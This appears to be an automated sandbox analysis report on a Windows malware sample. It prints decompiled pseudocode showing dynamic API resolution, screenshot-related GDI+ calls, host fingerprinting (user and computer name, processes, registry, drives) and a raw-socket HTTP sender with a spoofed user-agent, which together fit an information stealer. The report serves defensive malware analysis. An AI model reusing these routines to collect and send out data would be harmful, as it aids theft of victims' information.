                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BA1
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 00417BB5
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BBB
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 00417BCF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BD5
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 00417BE9
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417BEF
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 00417C03
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C09
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417C1D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417C23
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                                                                                                          • String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
                                                                                                                                                                                          • API String ID: 2574300362-2815069134
                                                                                                                                                                                          • Opcode ID: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
                                                                                                                                                                                          • Instruction ID: 8590a6e993e3993f4c60c6cfae4e59332f73d92cf5cac50a27a19d2551d8218b
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6ff4e77b6af1514c1edbe4635b7f249009bf5d1aab2232b2624014b7c9938ce
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3911D0F17C430069DA0177B2DD8BAE635B4BBC1B4A730447B7104722D2E97C888196DD
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00418124, Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 269libraryloadernetworkCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00418124(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v432;
				intOrPtr _v444;
				short _v446;
				char _v448;
				char _v1472;
				char _v1476;
				char _v1480;
				char _v1484;
				char _v1488;
				char _v1492;
				void* _t141;
				void* _t144;
				void* _t151;
				void* _t186;
				struct HINSTANCE__* _t193;
				struct HINSTANCE__* _t196;
				void* _t197;
				intOrPtr _t206;
				void* _t222;
				void* _t225;
				void* _t228;

				_v1476 = 0;
				_v1480 = 0;
				_v1484 = 0;
				_v1488 = 0;
				_v1492 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00403980(_v8);
				E00403980(_v12);
				E00403980(_v16);
				E00403980(_a16);
				E00403980(_a12);
				_push(_t228);
				_push(0x418535);
				_push( *[fs:eax]);
				 *[fs:eax] = _t228 + 0xfffffa30;
				E0040357C( &_v28, "wsock32.dll");
				_t196 = GetModuleHandleA(E004039E8( &_v28));
				if(_t196 == 0) {
					_t193 = LoadLibraryA(E004039E8( &_v28)); // executed
					_t196 = _t193;
				}
				 *0x41c89c = GetProcAddress(_t196,  &((E004039E8( &_v28))[0xc]));
				 *0x41c8a0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x17]));
				 *0x41c8a4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x25]));
				 *0x41c8a8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x2c]));
				 *0x41c8ac = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x31]));
				 *0x41c8b0 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x36]));
				 *0x41c8b4 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x3c]));
				 *0x41c8b8 = GetProcAddress(_t196,  &((E004039E8( &_v28))[0x44]));
				if(_t196 != 0 &&  *0x41c89c != 0 &&  *0x41c8a0 != 0 &&  *0x41c8a4 != 0 &&  *0x41c8a8 != 0 &&  *0x41c8ac != 0 &&  *0x41c8b0 != 0 &&  *0x41c8b4 != 0 &&  *0x41c8b8 != 0) {
					E004034E4( &_v24);
					_push( &_v432);
					_push(E00404EE4(2, 2));
					if( *0x41c89c() == 0) {
						_t141 =  *0x41c8a4(2, 1, 0); // executed
						_t225 = _t141;
						if(_t225 != 0xffffffff) {
							_v448 = 2;
							_t144 =  *0x41c8a0(E00403990(_v8)); // executed
							if(_t144 != 0) {
								_v444 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t144 + 0xc))))));
								_v446 =  *0x41c8b0(_a8);
								_t151 =  *0x41c8b4(_t225,  &_v448, 0x10);
								_t243 = _t151;
								if(_t151 == 0) {
									E00403850();
									E00403D2C( &_v1480, _v1484);
									E00417D60(E00403790(_a12), _t196,  &_v1488, _t225, _t243);
									E00403D2C( &_v1492, _a12);
									E00403E1C();
									E0040377C( &_v20, _v1476);
									 *0x41c8a8(_t225, E004039E8( &_v20), E00403790(_v20), 0, _v1492, L"\r\n\r\n", _v1488, _v1480, "Content-Length: ", 0x4185d8, "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", "User-agent: ", "Connection: close\r\n", 0x4185d8, _a16, "Host: ", " HTTP/1.0\r\n", _v12, 0x4185a8, _v16);
									E004034E4( &_v24);
									do {
										E004034E4( &_v32);
										E004028E0( &_v1472, 0x400);
										_t197 =  *0x41c8ac(_t225,  &_v1472, 0x400, 0);
										E004035D4( &_v32, _t197,  &_v1472);
										E00403798( &_v24, _v32);
									} while (_t197 > 0);
									 *0x41c8b8(_t225);
									_push( &_v24);
									_push(E00403A78(0x418680, _v24) + 4);
									_t186 = E00403790(_v24);
									_pop(_t222);
									E004039F0(_v24, _t186, _t222);
									E00403538(_a4, _v24);
								}
							}
						}
					}
				}
				_pop(_t206);
				 *[fs:eax] = _t206;
				_push(E0041853C);
				E00403B98( &_v1492, 2);
				E004034E4( &_v1484);
				E00403B98( &_v1480, 2);
				E00403508( &_v32, 7);
				return E00403508( &_a12, 2);
			}































                                                                                                                                                                                          0x00418131
                                                                                                                                                                                          0x00418137
                                                                                                                                                                                          0x0041813d
                                                                                                                                                                                          0x00418143
                                                                                                                                                                                          0x00418149
                                                                                                                                                                                          0x0041814f
                                                                                                                                                                                          0x00418152
                                                                                                                                                                                          0x00418155
                                                                                                                                                                                          0x00418158
                                                                                                                                                                                          0x0041815b
                                                                                                                                                                                          0x0041815e
                                                                                                                                                                                          0x00418161
                                                                                                                                                                                          0x00418167
                                                                                                                                                                                          0x0041816f
                                                                                                                                                                                          0x00418177
                                                                                                                                                                                          0x0041817f
                                                                                                                                                                                          0x00418187
                                                                                                                                                                                          0x0041818e
                                                                                                                                                                                          0x0041818f
                                                                                                                                                                                          0x00418194
                                                                                                                                                                                          0x00418197
                                                                                                                                                                                          0x004181a2
                                                                                                                                                                                          0x004181b5
                                                                                                                                                                                          0x004181b9
                                                                                                                                                                                          0x004181c4
                                                                                                                                                                                          0x004181c9
                                                                                                                                                                                          0x004181c9
                                                                                                                                                                                          0x004181dd
                                                                                                                                                                                          0x004181f4
                                                                                                                                                                                          0x0041820b
                                                                                                                                                                                          0x00418222
                                                                                                                                                                                          0x00418239
                                                                                                                                                                                          0x00418250
                                                                                                                                                                                          0x00418267
                                                                                                                                                                                          0x0041827e
                                                                                                                                                                                          0x00418285
                                                                                                                                                                                          0x004182f6
                                                                                                                                                                                          0x00418301
                                                                                                                                                                                          0x0041830b
                                                                                                                                                                                          0x00418314
                                                                                                                                                                                          0x00418320
                                                                                                                                                                                          0x00418326
                                                                                                                                                                                          0x0041832b
                                                                                                                                                                                          0x00418331
                                                                                                                                                                                          0x00418343
                                                                                                                                                                                          0x0041834b
                                                                                                                                                                                          0x00418358
                                                                                                                                                                                          0x00418369
                                                                                                                                                                                          0x0041837a
                                                                                                                                                                                          0x00418380
                                                                                                                                                                                          0x00418382
                                                                                                                                                                                          0x004183c9
                                                                                                                                                                                          0x004183da
                                                                                                                                                                                          0x004183f3
                                                                                                                                                                                          0x0041840c
                                                                                                                                                                                          0x00418422
                                                                                                                                                                                          0x00418430
                                                                                                                                                                                          0x0041844a
                                                                                                                                                                                          0x00418453
                                                                                                                                                                                          0x00418458
                                                                                                                                                                                          0x0041845b
                                                                                                                                                                                          0x0041846d
                                                                                                                                                                                          0x00418487
                                                                                                                                                                                          0x00418494
                                                                                                                                                                                          0x0041849f
                                                                                                                                                                                          0x004184a4
                                                                                                                                                                                          0x004184a9
                                                                                                                                                                                          0x004184b2
                                                                                                                                                                                          0x004184c3
                                                                                                                                                                                          0x004184c7
                                                                                                                                                                                          0x004184d1
                                                                                                                                                                                          0x004184d2
                                                                                                                                                                                          0x004184dd
                                                                                                                                                                                          0x004184dd
                                                                                                                                                                                          0x00418382
                                                                                                                                                                                          0x0041834b
                                                                                                                                                                                          0x0041832b
                                                                                                                                                                                          0x00418314
                                                                                                                                                                                          0x004184e4
                                                                                                                                                                                          0x004184e7
                                                                                                                                                                                          0x004184ea
                                                                                                                                                                                          0x004184fa
                                                                                                                                                                                          0x00418505
                                                                                                                                                                                          0x00418515
                                                                                                                                                                                          0x00418522
                                                                                                                                                                                          0x00418534

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC,0000044D), ref: 004181B0
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418535,?,00000000,00000000,?,00418B28,00000000,?,?,?,?,?,0041B0FC), ref: 004181C4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004181D8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000017), ref: 004181EF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000025), ref: 00418206
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000002C), ref: 0041821D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000031), ref: 00418234
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000036), ref: 0041824B
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00418262
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000044), ref: 00418279
                                                                                                                                                                                          • WSAStartup.WS2_32(00000000,?), ref: 0041830C
                                                                                                                                                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 00418320
                                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 00418343
                                                                                                                                                                                          • htons.WS2_32(00000000), ref: 00418363
                                                                                                                                                                                          • connect.WS2_32(00000000,00000002,00000010), ref: 0041837A
                                                                                                                                                                                          • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0041844A
                                                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 004184A9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$HandleLibraryLoadModuleStartupclosesocketconnectgethostbynamehtonssendsocket
                                                                                                                                                                                          • String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
                                                                                                                                                                                          • API String ID: 4159890453-3355491746
                                                                                                                                                                                          • Opcode ID: cc7a5bd10b09796705fbf6bc02ce29ddddcaf4dda09e662a85e1bab2a4bbd459
                                                                                                                                                                                          • Instruction ID: acd65350bdfe250b2cabb462dd412f1b2f53023e341749034ab9d15be0839763
                                                                                                                                                                                          • Opcode Fuzzy Hash: cc7a5bd10b09796705fbf6bc02ce29ddddcaf4dda09e662a85e1bab2a4bbd459
                                                                                                                                                                                          • Instruction Fuzzy Hash: 85B1DFB1940219AFDB11EF65CC86BDF7BB8EF44306F50407BF504B2291DB789A458E58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004065CC, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E004065CC(void* __eax) {
				short _v516;
				int _t7;
				void* _t12;
				DWORD* _t15;

				_t15 =  &_v516;
				_t12 = __eax;
				 *_t15 = 0xff;
				_t7 = GetUserNameW( &_v516, _t15); // executed
				if(_t7 == 0) {
					return E00403B80(_t12);
				}
				return E00403D10(_t12, 0x100,  &_v516);
			}







                                                                                                                                                                                          0x004065cd
                                                                                                                                                                                          0x004065d3
                                                                                                                                                                                          0x004065d5
                                                                                                                                                                                          0x004065e9
                                                                                                                                                                                          0x004065ed
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406603
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2645101109-0
                                                                                                                                                                                          • Opcode ID: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                                                                                                                                                                                          • Instruction ID: 82fb6e080fc5b909ee9ff94d6b2e2f71dc3c30d6621c9439b15b03eb027989ab
                                                                                                                                                                                          • Opcode Fuzzy Hash: 58214342b4f3c8a20619e49f8e08e79c98509e7b8ce26f5489de1e6ad425744d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 10E086712042025BD310EB58DC81A9A76D89B84315F00483EBC45D73D2EE3DDE589756
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040561C, Relevance: 220.8, APIs: 63, Strings: 63, Instructions: 312libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040561C() {
				struct HINSTANCE__* _t110;
				struct HINSTANCE__* _t112;
				struct HINSTANCE__* _t114;
				struct HINSTANCE__* _t116;
				struct HINSTANCE__* _t117;
				struct HINSTANCE__* _t120;
				_Unknown_base(*)()* _t121;

				 *0x41c678 = LoadLibraryA("kernel32.dll");
				 *0x41c67c = GetProcAddress( *0x41c678, "ExpandEnvironmentStringsW");
				 *0x41c680 = GetProcAddress( *0x41c678, "GetComputerNameW");
				 *0x41c684 = GetProcAddress( *0x41c678, "GlobalMemoryStatus");
				 *0x41c688 = GetProcAddress( *0x41c678, "CreateFileW");
				 *0x41c68c = GetProcAddress( *0x41c678, "GetFileSize");
				 *0x41c690 = GetProcAddress( *0x41c678, "CloseHandle");
				 *0x41c694 = GetProcAddress( *0x41c678, "ReadFile");
				 *0x41c698 = GetProcAddress( *0x41c678, "GetFileAttributesW");
				 *0x41c69c = GetProcAddress( *0x41c678, "CreateMutexA");
				 *0x41c6a0 = GetProcAddress( *0x41c678, "ReleaseMutex");
				 *0x41c6a4 = GetProcAddress( *0x41c678, "GetLastError");
				 *0x41c6a8 = GetProcAddress( *0x41c678, "GetCurrentDirectoryW");
				 *0x41c6ac = GetProcAddress( *0x41c678, "SetEnvironmentVariableW");
				 *0x41c6b0 = GetProcAddress( *0x41c678, "GetEnvironmentVariableW");
				 *0x41c6b4 = GetProcAddress( *0x41c678, "SetCurrentDirectoryW");
				 *0x41c6b8 = GetProcAddress( *0x41c678, "FindFirstFileW");
				 *0x41c6bc = GetProcAddress( *0x41c678, "FindNextFileW");
				 *0x41c6c0 = GetProcAddress( *0x41c678, "LocalFree");
				 *0x41c6c4 = GetProcAddress( *0x41c678, "GetTickCount");
				 *0x41c6c8 = GetProcAddress( *0x41c678, "CopyFileW");
				 *0x41c6cc = GetProcAddress( *0x41c678, "FindClose");
				 *0x41c6d0 = GetProcAddress( *0x41c678, "GlobalMemoryStatusEx");
				 *0x41c6d4 = GetProcAddress( *0x41c678, "CreateToolhelp32Snapshot");
				 *0x41c6d8 = GetProcAddress( *0x41c678, "Process32FirstW");
				 *0x41c6dc = GetProcAddress( *0x41c678, "Process32NextW");
				 *0x41c6e0 = GetProcAddress( *0x41c678, "GetModuleFileNameW");
				 *0x41c6e4 = GetProcAddress( *0x41c678, "SetDllDirectoryW");
				 *0x41c6e8 = GetProcAddress( *0x41c678, "GetLocaleInfoA");
				 *0x41c6ec = GetProcAddress( *0x41c678, "GetLocalTime");
				 *0x41c6f0 = GetProcAddress( *0x41c678, "GetTimeZoneInformation");
				 *0x41c6f4 = GetProcAddress( *0x41c678, "RemoveDirectoryW");
				 *0x41c6f8 = GetProcAddress( *0x41c678, "DeleteFileW");
				 *0x41c6fc = GetProcAddress( *0x41c678, "GetLogicalDriveStringsA");
				 *0x41c700 = GetProcAddress( *0x41c678, "GetDriveTypeA");
				 *0x41c704 = GetProcAddress( *0x41c678, "CreateProcessW");
				 *0x41c708 = LoadLibraryA("advapi32.dll");
				 *0x41c70c = GetProcAddress( *0x41c708, "GetUserNameW");
				 *0x41c710 = GetProcAddress( *0x41c708, "RegCreateKeyExW");
				 *0x41c714 = GetProcAddress( *0x41c708, "RegQueryValueExW");
				 *0x41c718 = GetProcAddress( *0x41c708, "RegCloseKey");
				 *0x41c71c = GetProcAddress( *0x41c708, "RegOpenKeyExW");
				 *0x41c720 = GetProcAddress( *0x41c708, "AllocateAndInitializeSid");
				 *0x41c724 = GetProcAddress( *0x41c708, "LookupAccountSidA");
				 *0x41c728 = GetProcAddress( *0x41c708, "CreateProcessAsUserW");
				 *0x41c72c = GetProcAddress( *0x41c708, "CheckTokenMembership");
				 *0x41c730 = GetProcAddress( *0x41c708, "RegOpenKeyW");
				 *0x41c734 = GetProcAddress( *0x41c708, "RegEnumKeyW");
				 *0x41c738 = GetProcAddress( *0x41c708, "RegEnumValueW");
				 *0x41c73c = GetProcAddress( *0x41c708, "CryptAcquireContextA");
				 *0x41c740 = GetProcAddress( *0x41c708, "CryptCreateHash");
				 *0x41c744 = GetProcAddress( *0x41c708, "CryptHashData");
				 *0x41c748 = GetProcAddress( *0x41c708, "CryptGetHashParam");
				 *0x41c74c = GetProcAddress( *0x41c708, "CryptDestroyHash");
				 *0x41c750 = GetProcAddress( *0x41c708, "CryptReleaseContext");
				 *0x41c754 = LoadLibraryA("user32.dll");
				_t110 =  *0x41c754; // 0x770a0000
				 *0x41c758 = GetProcAddress(_t110, "EnumDisplayDevicesW");
				_t112 =  *0x41c754; // 0x770a0000
				 *0x41c75c = GetProcAddress(_t112, "wvsprintfA");
				_t114 =  *0x41c754; // 0x770a0000
				 *0x41c760 = GetProcAddress(_t114, "GetKeyboardLayoutList");
				_t116 = LoadLibraryA("shell32.dll"); // executed
				 *0x41c764 = _t116;
				_t117 =  *0x41c764; // 0x748e0000
				 *0x41c768 = GetProcAddress(_t117, "ShellExecuteExW");
				 *0x41c76c = LoadLibraryA("ntdll.dll");
				_t120 =  *0x41c76c; // 0x77df0000
				_t121 = GetProcAddress(_t120, "RtlComputeCrc32");
				 *0x41c770 = _t121;
				return _t121;
			}










                                                                                                                                                                                          0x00405632
                                                                                                                                                                                          0x00405641
                                                                                                                                                                                          0x00405653
                                                                                                                                                                                          0x00405665
                                                                                                                                                                                          0x00405677
                                                                                                                                                                                          0x00405689
                                                                                                                                                                                          0x0040569b
                                                                                                                                                                                          0x004056ad
                                                                                                                                                                                          0x004056bf
                                                                                                                                                                                          0x004056d1
                                                                                                                                                                                          0x004056e3
                                                                                                                                                                                          0x004056f5
                                                                                                                                                                                          0x00405707
                                                                                                                                                                                          0x00405719
                                                                                                                                                                                          0x0040572b
                                                                                                                                                                                          0x0040573d
                                                                                                                                                                                          0x0040574f
                                                                                                                                                                                          0x00405761
                                                                                                                                                                                          0x00405773
                                                                                                                                                                                          0x00405785
                                                                                                                                                                                          0x00405797
                                                                                                                                                                                          0x004057a9
                                                                                                                                                                                          0x004057bb
                                                                                                                                                                                          0x004057cd
                                                                                                                                                                                          0x004057df
                                                                                                                                                                                          0x004057f1
                                                                                                                                                                                          0x00405803
                                                                                                                                                                                          0x00405815
                                                                                                                                                                                          0x00405827
                                                                                                                                                                                          0x00405839
                                                                                                                                                                                          0x0040584b
                                                                                                                                                                                          0x0040585d
                                                                                                                                                                                          0x0040586f
                                                                                                                                                                                          0x00405881
                                                                                                                                                                                          0x00405893
                                                                                                                                                                                          0x004058a5
                                                                                                                                                                                          0x004058b4
                                                                                                                                                                                          0x004058c3
                                                                                                                                                                                          0x004058d5
                                                                                                                                                                                          0x004058e7
                                                                                                                                                                                          0x004058f9
                                                                                                                                                                                          0x0040590b
                                                                                                                                                                                          0x0040591d
                                                                                                                                                                                          0x0040592f
                                                                                                                                                                                          0x00405941
                                                                                                                                                                                          0x00405953
                                                                                                                                                                                          0x00405965
                                                                                                                                                                                          0x00405977
                                                                                                                                                                                          0x00405989
                                                                                                                                                                                          0x0040599b
                                                                                                                                                                                          0x004059ad
                                                                                                                                                                                          0x004059bf
                                                                                                                                                                                          0x004059d1
                                                                                                                                                                                          0x004059e3
                                                                                                                                                                                          0x004059f5
                                                                                                                                                                                          0x00405a04
                                                                                                                                                                                          0x00405a0e
                                                                                                                                                                                          0x00405a19
                                                                                                                                                                                          0x00405a23
                                                                                                                                                                                          0x00405a2e
                                                                                                                                                                                          0x00405a38
                                                                                                                                                                                          0x00405a43
                                                                                                                                                                                          0x00405a4d
                                                                                                                                                                                          0x00405a52
                                                                                                                                                                                          0x00405a5c
                                                                                                                                                                                          0x00405a67
                                                                                                                                                                                          0x00405a76
                                                                                                                                                                                          0x00405a80
                                                                                                                                                                                          0x00405a86
                                                                                                                                                                                          0x00405a8b
                                                                                                                                                                                          0x00405a92

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
